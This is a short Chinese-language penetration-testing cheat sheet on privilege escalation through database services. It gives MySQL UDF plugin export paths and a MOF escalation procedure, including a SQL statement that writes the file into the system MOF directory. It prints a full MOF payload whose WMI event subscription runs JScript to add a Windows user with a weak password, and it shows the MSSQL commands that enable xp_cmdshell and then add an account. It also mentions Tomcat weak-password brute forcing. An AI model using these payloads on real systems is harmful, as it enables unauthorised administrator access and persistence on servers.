服务提权
UDF提权
windows
UDF
mysql版本 < 5.1 , UDF导出到系统目录c:/windows/system32/
mysql版本>5.1 ,UDF导出到安静路径MYSQL/Lib/Plugin/
linux
/usr/lib/mysql/plugin/
要求有些权限,单引号未被过滤
MOF提权
windows专属
流程: 1、 首先找个可写的目录,将我们的MOF文件上传上去。
2、 执行以下sql语句,mof文件内的命令便会执行。
select load_file(‘C:/wmpub/nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’
mofcomp.exe xxxxx.mof 执行mof文件
调用imofompiler接口的$complieFile方法
#pragma namespace(“\\.\root\subscription”)
instance of __EventFilter as $EventFilter
{
EventNamespace = “Root\Cimv2”;
Name = “filtP2”;
Query = “Select * From __InstanceModificationEvent “
“Where TargetInstance Isa ”Win32_LocalTime” “
“And TargetInstance.Second = 5”;
QueryLanguage = “WQL”;
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = “consPCSV2”;
ScriptingEngine = “JScript”;
ScriptText =
“var WSH = new ActiveXObject(”WScript.Shell”)
WSH.run(”net.exe user secist 123 /add”)“;
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
mssql
xp_cmdshell
开启:EXEC sp_configure ‘show advanced options’, 1;
RECONFIGURE;
EXEC sp_configure ‘xp_cmdshell’, 1;
RECONFIGURE;
exec xp_cmdshell ‘net user test test /add’
xp_regwrite
xp_regrea
tomcat
弱口令爆破